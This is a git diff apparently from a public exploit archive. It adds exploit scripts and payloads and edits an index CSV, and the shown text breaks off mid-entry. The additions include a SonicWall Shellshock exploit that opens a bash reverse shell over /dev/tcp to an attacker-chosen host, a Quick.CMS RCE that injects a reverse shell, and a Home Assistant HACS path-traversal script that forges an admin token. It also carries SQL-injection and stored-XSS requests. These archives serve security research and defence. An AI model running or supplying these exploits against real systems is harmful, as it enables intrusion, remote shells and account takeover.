diff --git a/exploits/hardware/webapps/49499.py b/exploits/hardware/webapps/49499.py new file mode 100755 index 000000000..52ff8e836 --- /dev/null +++ b/exploits/hardware/webapps/49499.py @@ -0,0 +1,105 @@ +# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated) +# Exploit Author: Darren Martyn +# Vendor Homepage: https://www.home-assistant.io/ +# Version: < SMA 8.0.0.4 +# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ + +#!/usr/bin/python +# coding: utf-8 +# Author: Darren Martyn +# Credit: Phineas Fisher +# Notes: +# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team +# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command +# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns +# a trivial reverse shell using /dev/tcp. +# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but +# implementing that is left as an exercise for the reader. I've seen a few approaches, and +# would be interested in seeing yours. +# There is another LPE that works only on some models which I also have removed from this. +# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ +import requests +import sys +import telnetlib +import socket +from threading import Thread +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import time + +def banner(): + print """ + + 88 88 + "" 88 + 88 +8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 +`8b d8' 88 I8[ "" 88 88 "" `Y8 88 + `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 + `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 + "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 + + + + 88 + 88 + 88 + ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, + a8" `Y88 a8" "8a a8" "8a 88P' "Y8 + 8b 88 8b d8 8b d8 88 + "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 + `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 + SonicWall SSL-VPN Appliance Remote Exploit +Public Release (Jan 2021). Author: Darren Martyn. Credit +goes to Phineas Fisher for this. Stay inside, do crimes. + """ + +def handler(lp): # handler borrowed from Stephen Seeley. + print "(+) starting handler on port %d" %(lp) + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lp)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" %(addr[0]) + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def execute_command(target, command): + url = target + "/cgi-bin/jarrewrite.sh" + headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} + r = requests.get(url=url, headers=headers, verify=False) + return r.text + +def check_exploitable(target): + print "(+) Testing %s for pwnability..." %(target) + output = execute_command(target=target, command="cat /etc/passwd") + if "root:" in output: + print "(*) We can continue, time to wreck this shit." + return True + else: + return False + +def pop_reverse_shell(target, cb_host, cb_port): + print "(+) Sending callback to %s:%s" %(cb_host, cb_port) + backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) + execute_command(target=target, command=backconnect) + +def hack_the_planet(target, cb_host, cb_port): + if check_exploitable(target) == True: + pass + else: + sys.exit("(-) Target not exploitable...") + handlerthr = Thread(target=handler, args=(int(cb_port),)) + handlerthr.start() + pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) + +def main(args): + banner() + if len(args) != 4: + sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) + hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) + +if __name__ == "__main__": + main(args=sys.argv) \ No newline at end of file diff --git a/exploits/php/webapps/49294.txt b/exploits/php/webapps/49294.txt deleted file mode 100644 index c239fd3c3..000000000 --- a/exploits/php/webapps/49294.txt +++ /dev/null @@ -1,37 +0,0 @@ -# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload -# Date: 12/20/2020 -# Exploit Author: Ramón Vila Ferreres (@ramonvfer) -# Vendor Homepage: https://contactform7.com -# Software Link: https://wordpress.org/plugins/contact-form-7/ -# Version: 5.3.1 and below -# Tested on: Windows 10 1909, Ubuntu 20.4 - -Explanation ---------------------------------------------------------------------- -ContactForm7 version 5.3.1 and below doesn't properly sanitize -uploaded filenames to prevent Arbitrary File Upload that can lead -to full server takeover in the worst-case scenario. - -This happens in the wpcf7_antiscript_file_name function, that fails -to sanitize the provided filename if it ends with any Unicode special -character ranging from U+0000 (null) to U+001F (us). - -The function matches both the file name and the file extension against -an exclusion regex. Appending any unicode special character to the -file extension results in a complete bypass of this verification (as -the regex doesn't match) leading to the Unrestricted File Upload. - -Exploit ---------------------------------------------------------------------- -1. Change the file extension of the file you want to upload (e.g: -"shell.php") to its equivalent with the special character ending (in -this case "shell.php" (appended U+0000)) - -2. Upload the file using ContactForm7 file upload feature in the -target website. - -3. Go to /wp-content/uploads/wpcf7_uploads/shell.php -Note the special character at the end -Note that the file upload location may vary as it is configurable. - -4. Now you have uploaded your file! \ No newline at end of file diff --git a/exploits/php/webapps/49468.txt b/exploits/php/webapps/49468.txt index f66b049f4..76e622687 100644 --- a/exploits/php/webapps/49468.txt +++ b/exploits/php/webapps/49468.txt @@ -4,6 +4,7 @@ # Vendor Homepage: https://collabtive.o-dyn.de/ # Version: 3.1 # Tested on: Windows & XAMPP +# CVE: CVE-2021-3298 ==> Tutorial <== diff --git a/exploits/php/webapps/49492.txt b/exploits/php/webapps/49492.txt new file mode 100644 index 000000000..25247c32d --- /dev/null +++ b/exploits/php/webapps/49492.txt @@ -0,0 +1,15 @@ +# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting +# Exploit Author: LiPeiYi +# Date: 2020-12-18 +# Vendor Homepage: https://www.bloofox.com/ +# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 +# Version: 0.5.1.0 -.5.2.1 +# Tested on: windows 10 + +Vulnerable paper: /admin/include/inc_content_articles.php + +Steps to reproduce: + +1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side. +2: Add the new post and then add the payload "payload: " in "text" parameter and click on save button. Post Saved successfully. +3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies. \ No newline at end of file diff --git a/exploits/php/webapps/49493.txt b/exploits/php/webapps/49493.txt new file mode 100644 index 000000000..07aa68b2d --- /dev/null +++ b/exploits/php/webapps/49493.txt @@ -0,0 +1,30 @@ +# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection +# Date: 2021-01-28 +# Exploit Author: Ruchi Tiwari +# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +--------------------------------------------------------------------------------- + +#parameter Vulnerable: uname +# Injected Request +POST /onlinegradingsystem/admin/login.php HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 122 +Origin: http://localhost:8080 +Connection: close +Referer: http://localhost:8080/onlinegradingsystem/admin/login.php +Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us +Upgrade-Insecure-Requests: 1 + +uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin= + +#Application will load after 20 minutes. +-------------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49494.py b/exploits/php/webapps/49494.py new file mode 100755 index 000000000..480274e9a --- /dev/null +++ b/exploits/php/webapps/49494.py @@ -0,0 +1,71 @@ +# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) +# Date: 2020-12-28 +# Exploit Author: mari0x00 +# Vendor Homepage: https://opensolution.org/ +# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip +# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ +# Version: <= 6.7 +# CVE : CVE-2020-35754 + +#!/usr/bin/python3 + +import requests +import sys +from termcolor import colored +from time import sleep + +print(colored('''###########################################################''',"red")) +print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) +print(colored('''###########################################################''',"red")) +print("") + +if len(sys.argv) != 6: + print((colored("[~] Usage : python3 quickpwn.py ","red"))) + print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +IP = sys.argv[4] +PORT = sys.argv[5] + + +#Start session +s = requests.Session() +headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} + + +#Authenticate +print((colored("[+] Attempting user login","blue"))) + +login_data = { + "sEmail": username, + "sPass": password, + "bAcceptLicense": "1", + "iAcceptLicense": "true" + } + +login = s.post(url+"admin.php?p=login", login_data, headers=headers) +sleep(0.5) + + +#Exploit +print((colored("[+] Adding shell command","blue"))) +payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" + +shell = { + "sOption": "save", + "Back_end_only": payload +} + +exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) +sleep(1) + +#Triggering reverse shell (three times just in case) +print("") +print((colored("[+] Triggering the shell. Go nuts!","green"))) +r = s.get(url+"admin.php?p=languages", headers=headers) +sleep(1) +r = s.get(url+"admin.php?p=languages", headers=headers) +sleep(1) +r = s.get(url+"admin.php?p=languages", headers=headers) \ No newline at end of file diff --git a/exploits/php/webapps/49496.txt b/exploits/php/webapps/49496.txt new file mode 100644 index 000000000..755cefd04 --- /dev/null +++ b/exploits/php/webapps/49496.txt @@ -0,0 +1,18 @@ +# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure +# Date: 1/27/2021 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430 +# Version: 1.0 +# Tested on: Windows 10 +# CVE: CVE-2021-3337 + +1. Description: +This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying. + +2. Proof of Concept: + +- Visit a post where content is hidden +- Click the reply or quote button below +Thread content will be displayed in the [quote] bracket without needing to reply \ No newline at end of file diff --git a/exploits/php/webapps/49497.txt b/exploits/php/webapps/49497.txt new file mode 100644 index 000000000..9e78899f5 --- /dev/null +++ b/exploits/php/webapps/49497.txt @@ -0,0 +1,20 @@ +# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi +# Exploit Author: Richard Jones +# Date: 2021-01-26 +# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +POST /chat/login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 +Connection: close +Referer: http://localhost/chat/index.php?attempt= +Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl +Upgrade-Insecure-Requests: 1 + +username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+-- \ No newline at end of file diff --git a/exploits/php/webapps/49498.txt b/exploits/php/webapps/49498.txt new file mode 100644 index 000000000..a64b97dcb --- /dev/null +++ b/exploits/php/webapps/49498.txt @@ -0,0 +1,23 @@ +# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting +# Exploit Author: Richard Jones +# Date: 2021-01-26 +# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +#Replicates across chat sessions.. + + +POST /chat/send_message.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 58 +Origin: http://localhost +Connection: close +Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl + +msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1 \ No newline at end of file diff --git a/exploits/python/webapps/49495.py b/exploits/python/webapps/49495.py new file mode 100755 index 000000000..63f12d569 --- /dev/null +++ b/exploits/python/webapps/49495.py @@ -0,0 +1,86 @@ +# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover +# Date: 2021-01-28 +# Exploit Author: Lyghtnox +# Vendor Homepage: https://www.home-assistant.io/ +# Software Link: https://github.com/hacs/integration +# Version: < 1.10.0 +# Tested on: Raspbian + Home Assistant 2021.1.0 +# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/ + +# STEP 1: Run the exploit (python3 exploit.py host port) +# STEP 2: Copy the token printed and set in your browser's local storage with +# the key `hassTokens` + +import requests +import jwt +import json +import argparse + + +class HA: + def __init__(self, ip, port): + self.ip = ip + self.port = port + + def retrieveFile(self, f): + url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}' + with requests.Session() as s: + r = requests.Request(method='GET', url=url) + prep = r.prepare() + prep.url = url + try: + r = s.send(prep, verify=False) + except requests.exceptions.ConnectionError: + return + if r.status_code == 400 or r.status_code == 404: + return + return r + + def craftToken(self): + f = self.retrieveFile('.storage/auth').json() + + # Find owner + for user in f['data']['users']: + if user['is_owner']: + self.owner = user['id'] + break + else: + print("No owner found. Using first account") + self.owner = f['data']['users'][0]['id'] + + for token in f['data']['refresh_tokens']: + if self.owner == token['user_id']: + encoded_jwt = jwt.encode({'iss': token['id']}, + token['jwt_key'], + algorithm="HS256") + self.token = {'access_token': encoded_jwt, + 'token_type': 'Bearer', + 'refresh_token': token['token'], + 'expires_in': 1800, + 'hassUrl': f"http://{self.ip}:{self.port}", + 'clientId': token['client_id']} + return self.token + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Exploit a vulnerability in \ +HACS < 1.10.0 to gain admin access to an Home Assistant instance.") + parser.add_argument("host", type=str, help="IP of the HASS instance") + parser.add_argument("port", type=int, help="port of the HASS instance") + args = parser.parse_args() + + r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format( + ip=args.host, + port=args.port)) + if r.status_code != 404: + print("HACS found! Testing vulnerability...", end='', flush=True) + ha = HA(args.host, args.port) + if ha.retrieveFile('configuration.yaml'): + print(": VULNERABLE") + token = ha.craftToken() + if token: + print(f"Use the following 'hassTokens': {json.dumps(token)}") + else: + print("Unable to craft token") + else: + print(": Not vulnerable") \ No newline at end of file diff --git a/exploits/windows/local/49116.py b/exploits/windows/local/49116.py index 77ce33d1d..8ebe69c8d 100755 --- a/exploits/windows/local/49116.py +++ b/exploits/windows/local/49116.py @@ -1,5 +1,5 @@ # Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution -# Date: August 29, 2020 +# Date: 2020-08-29 # Exploit Author: CrossWire # Vendor Homepage: https://www.foxitsoftware.com/ # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English diff --git a/files_exploits.csv b/files_exploits.csv index d9cde1dd8..87a5e67a0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -55,13 +55,13 @@ id,file,description,date,author,type,platform,port 356,exploits/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,dos,windows, 357,exploits/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow (PoC)",2004-07-20,"Luigi Auriemma",dos,windows, 358,exploits/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",dos,hardware, -360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)",2004-07-22,bkbll,dos,multiple,80 +360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers (Denial of Service)",2004-07-22,bkbll,dos,multiple,80 362,exploits/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,dos,windows, 363,exploits/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",dos,hardware, -365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,dos,windows, +365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service",2004-07-23,Phuong,dos,windows, 366,exploits/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,dos,windows, 370,exploits/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,dos,linux, -371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,dos,linux, +371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service",2004-08-02,anonymous,dos,linux, 376,exploits/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,dos,windows, 383,exploits/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",dos,multiple,31337 385,exploits/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,dos,windows, @@ -184,8 +184,8 @@ id,file,description,date,author,type,platform,port 1027,exploits/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,dos,windows, 1037,exploits/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,dos,multiple, 1056,exploits/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,dos,multiple, -1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,dos,php, -1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,dos,php, +1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,g30rg3_x,dos,php, +1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,HaCkZaTaN,dos,php, 1065,exploits/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)",2005-06-23,cybertronic,dos,windows, 1067,exploits/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,dos,windows, 1072,exploits/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",dos,multiple, @@ -373,13 +373,13 @@ id,file,description,date,author,type,platform,port 2057,exploits/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,dos,windows, 2059,exploits/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,dos,hardware, 2073,exploits/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",dos,multiple, -2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,dos,windows, -2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,dos,windows, +2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-07,ratboy,dos,windows, +2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-08,Elo,dos,windows, 2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",dos,hardware, 2160,exploits/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",dos,windows, 2176,exploits/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,dos,hardware, 2179,exploits/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,dos,multiple, -2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,dos,multiple, +2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service",2006-08-13,Preddy,dos,multiple, 2194,exploits/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,dos,windows, 2195,exploits/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete",2006-08-16,nop,dos,windows, 2204,exploits/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,dos,windows, @@ -399,7 +399,7 @@ id,file,description,date,author,type,platform,port 2524,exploits/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,dos,bsd, 2541,exploits/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,dos,bsd, 2542,exploits/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,dos,bsd, -2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,dos,windows, +2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service",2006-10-16,n00b,dos,windows, 2586,exploits/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",dos,multiple, 2587,exploits/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",dos,multiple, 2597,exploits/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",dos,multiple, @@ -408,7 +408,7 @@ id,file,description,date,author,type,platform,port 2639,exploits/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",dos,bsd, 2650,exploits/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",dos,windows, 2672,exploits/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,dos,windows, -2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,dos,windows, +2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service",2006-10-30,x82,dos,windows, 2695,exploits/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",dos,multiple, 2700,exploits/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",dos,hardware, 2708,exploits/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,dos,windows, @@ -488,7 +488,7 @@ id,file,description,date,author,type,platform,port 3182,exploits/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,dos,windows, 3190,exploits/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,dos,windows, 3193,exploits/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,dos,windows, -3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,dos,osx, +3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service",2007-01-25,MoAB,dos,osx, 3204,exploits/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",dos,windows, 3223,exploits/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",dos,cgi, 3224,exploits/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",dos,windows, @@ -1281,7 +1281,7 @@ id,file,description,date,author,type,platform,port 10223,exploits/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,dos,windows,21 10229,exploits/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",dos,multiple, 10237,exploits/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,dos,hardware,80 -10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,dos,php, +10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service",2009-11-27,Eren,dos,php, 10243,exploits/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",dos,php, 10257,exploits/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",dos,windows,21 10303,exploits/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",dos,windows, @@ -1755,7 +1755,7 @@ id,file,description,date,author,type,platform,port 15248,exploits/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",dos,windows, 15250,exploits/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,dos,windows, 15263,exploits/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",dos,windows, -15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,dos,aix, +15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure",2010-10-16,ZoRLu,dos,aix, 15257,exploits/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows, 15258,exploits/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows, 15259,exploits/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",dos,windows, @@ -2461,8 +2461,8 @@ id,file,description,date,author,type,platform,port 20311,exploits/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,dos,windows, 20323,exploits/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",dos,hardware, 20328,exploits/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",dos,hardware, -20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,dos,hardware, -20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,dos,hardware, +20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-16,Rootshell,dos,hardware, +20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-17,Rootshell,dos,hardware, 20336,exploits/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",dos,multiple, 43153,exploits/windows/dos/43153.js,"Microsoft Edge Chakra: JIT - 